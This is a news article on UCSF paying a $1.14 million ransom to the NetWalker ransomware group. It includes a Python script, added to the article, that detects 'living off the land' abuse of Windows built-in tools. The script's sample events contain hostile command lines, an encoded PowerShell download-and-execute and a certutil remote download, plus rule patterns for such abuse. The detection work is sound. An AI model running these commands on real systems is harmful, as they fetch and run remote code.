
Attacks/Breaches

6/29/2020
05:30 PM

University of California SF Pays Ransom After Medical Servers Hit

As one of at least three universities hit in June, the school paid $1.14 million to cybercriminals following an attack on "several IT systems" in the UCSF School of Medicine.

The University of California San Francisco paid about $1.14 million to ransomware operators earlier this month after their malware compromised several important servers in the UCSF School of Medicine and encrypted them to block access, UCSF administrators stated on June 26.

The crypto-ransomware attacks, which have been attributed to the NetWalker group, also reportedly hit Michigan State University and Columbia College of Chicago. UCSF, which has pursued a substantial amount of research on coronavirus and COVID-19, stated that the attacks had not affected that research, nor had an impact on the operations of its medical center and patient care.

However, the ransomware had affected "a limited number of servers" in the medical school, the university said in a statement.

"The data that was encrypted is important to some of the academic work we pursue as a university serving the public good," the statement said. "We therefore made the difficult decision to pay some portion of the ransom, approximately $1.14 million, to the individuals behind the malware attack in exchange for a tool to unlock the encrypted data and the return of the data they obtained."

UCSF's information technology department caught the attack in progress and "quarantined several IT systems within the School of Medicine as a safety measure," preventing the attack from reaching the "core UCSF network," the university said in the June 26 statement.

The attack and its million-dollar consequences show that organizations must be able to recognize attacks and stop them much more quickly, says Marcus Fowler, director of strategic threat at Darktrace, a threat protection firm.

"I think with ransomware, speed and visibility is going to be the key," he says. "They are running around and unplugging machines to manage the bleeding, rather than focusing on what happened."

NetWalker started attacking organizations in 2019, focusing on large, global entities, according to cybersecurity firm SentinelOne. The group relies heavily on generic system tools and so-called "living off the land" tactics, in which attackers use utilities already present on a system rather than dropping their own malware, so that the activity blends in with normal administration and evades detection, Jim Walter, a senior threat researcher at SentinelOne, wrote in a blog post on the group.
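The "living off the land" pattern described above is what endpoint telemetry has to catch: not a new binary, but a trusted Windows utility launched in an unusual way. The following is an added example written for this article, not code from UCSF, SentinelOne or the NetWalker operators. The rule set, the process-event format and the sample events are constructed assumptions (generic LOLBin heuristics, not a description of NetWalker's actual tooling); the script flags abused built-ins such as certutil and an encoded PowerShell launch spawned from Word, while leaving ordinary administrative use of the same tools unflagged.

```python
"""Flag 'living off the land' process launches in constructed process-creation logs.

Added illustration for this article; not code from UCSF, SentinelOne or the
NetWalker operators. The rules below are generic LOLBin heuristics (hypothetical,
chosen for this example), not a description of NetWalker's tooling.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class ProcEvent:
    ts: str          # event timestamp (ISO 8601)
    parent: str      # parent process image name
    image: str       # launched process image name
    cmdline: str     # full command line


# Built-in Windows utilities attackers commonly abuse, paired with the argument
# patterns that distinguish abuse from ordinary administrative use (assumed rules).
LOLBIN_RULES = {
    "certutil.exe": [r"-urlcache", r"-decode", r"-encode"],
    "mshta.exe": [r"https?://", r"javascript:", r"vbscript:"],
    "regsvr32.exe": [r"/i:https?://", r"scrobj\.dll"],
    "rundll32.exe": [r"javascript:", r"https?://"],
    "bitsadmin.exe": [r"/transfer", r"/addfile"],
    "wmic.exe": [r"process\s+call\s+create", r"/node:"],
    "powershell.exe": [r"-e(nc|ncodedcommand)?\b", r"downloadstring", r"iex\b",
                       r"-w(indowstyle)?\s+hidden", r"-nop(rofile)?\b"],
}

# An Office or PDF reader spawning a script host is a classic phishing chain.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "acrord32.exe"}

_ENC_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Return the decoded script of a -EncodedCommand launch, or None.

    PowerShell expects base64 of UTF-16LE text; anything that fails to decode
    is treated as 'not an encoded command' rather than raising.
    """
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: ProcEvent) -> list[str]:
    """Return the list of rule hits for one event (empty list means benign)."""
    hits: list[str] = []
    image = ev.image.lower()
    text = ev.cmdline.lower()
    decoded = decode_encoded_powershell(ev.cmdline)
    if decoded:
        text += " " + decoded.lower()   # inspect the decoded payload as well
        hits.append("powershell:encoded-command")
    for pat in LOLBIN_RULES.get(image, []):
        if re.search(pat, text):
            hits.append(f"{image}:{pat}")
    if ev.parent.lower() in SUSPICIOUS_PARENTS and image in LOLBIN_RULES:
        hits.append(f"suspicious-parent:{ev.parent.lower()}")
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[ProcEvent, list[str]]]:
    """Run every event through score_event and keep only the ones with hits."""
    return [(ev, h) for ev in events if (h := score_event(ev))]


# Constructed sample events for this example (not real UCSF or NetWalker telemetry).
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
    .encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcEvent("2020-06-01T09:12:03Z", "explorer.exe", "powershell.exe",
              "powershell.exe Get-Process | Sort-Object CPU"),            # benign admin use
    ProcEvent("2020-06-01T09:15:41Z", "winword.exe", "powershell.exe",
              f"powershell.exe -w hidden -nop -enc {ENCODED}"),            # phishing chain
    ProcEvent("2020-06-01T09:16:02Z", "cmd.exe", "certutil.exe",
              "certutil.exe -urlcache -split -f http://198.51.100.7/x.dat "
              "C:\\Users\\Public\\x.dat"),                                 # download via LOLBin
    ProcEvent("2020-06-01T09:20:10Z", "services.exe", "certutil.exe",
              "certutil.exe -verify C:\\Windows\\Temp\\cert.cer"),          # benign
]

if __name__ == "__main__":
    for ev, hits in scan(SAMPLE_EVENTS):
        print(ev.ts, ev.parent, "->", ev.image, hits)
```

The point of decoding the `-EncodedCommand` payload before matching is that an encoded launch hides `IEX` and `DownloadString` from any rule that only looks at the raw command line; the parent-process check catches the Office-spawns-PowerShell chain even when the arguments themselves look bland.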

In February, the group attacked the Toll Group, an Australian shipping and logistics firm, causing disruptions to the company's operations and customers, according to media reports. In March 2020, the NetWalker group infected multiple hospitals in Spain, luring victims into opening malicious PDF documents that promised updated information on COVID-19. The latter incident, along with the attack on UCSF, highlights that cybercriminal groups — which had pledged to refrain from attacking hospitals and medical-research facilities during the coronavirus pandemic — cannot be trusted to forgo profits.

NetWalker, in particular, appears to be attacking with abandon — and leaking data, if the organization does not pay, Walter says.

"Consequently, detection and clean-up is no longer sufficient to ensure organizational data remains confidential and secure," he wrote in the blog post. "Prevention is the only cure for threats like NetWalker, which hit organizations with the double-edged sword of encryption by ransomware and extortion via threats of public data exposure."

BBC News managed to get a fly-on-the-wall view of the negotiation between UCSF and the NetWalker criminal group — a negotiation that started at $3 million. After some back and forth, the two parties negotiated to 116.4 Bitcoins, or $1.14 million, which the school paid.

The school notified the FBI and is cooperating with the bureau's investigation. The university does not believe that any sensitive medical information was exposed by the attack.

"Our investigation is ongoing but, at this time, we believe that the malware encrypted our servers opportunistically, with no particular area being targeted," UCSF stated in its statement. "The attackers obtained some data as proof of their action, to use in their demand for a ransom payment."

The school declined to offer additional details, citing the ongoing federal investigation.

"In order to preserve the integrity of the investigation, we are limited in what we can share at this time and appreciate everyone's patience as we resolve this situation," UCSF said in its June 17 statement.

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline ... View Full Bio
 

Comments

RyanSepe
User Rank: Ninja
6/30/2020 | 11:01:20 PM
Facepalm
How many healthcare shops need to be burnt by the stove before they put in an effective backup process to prevent these types of incidents? Honestly, at this point it's just negligence.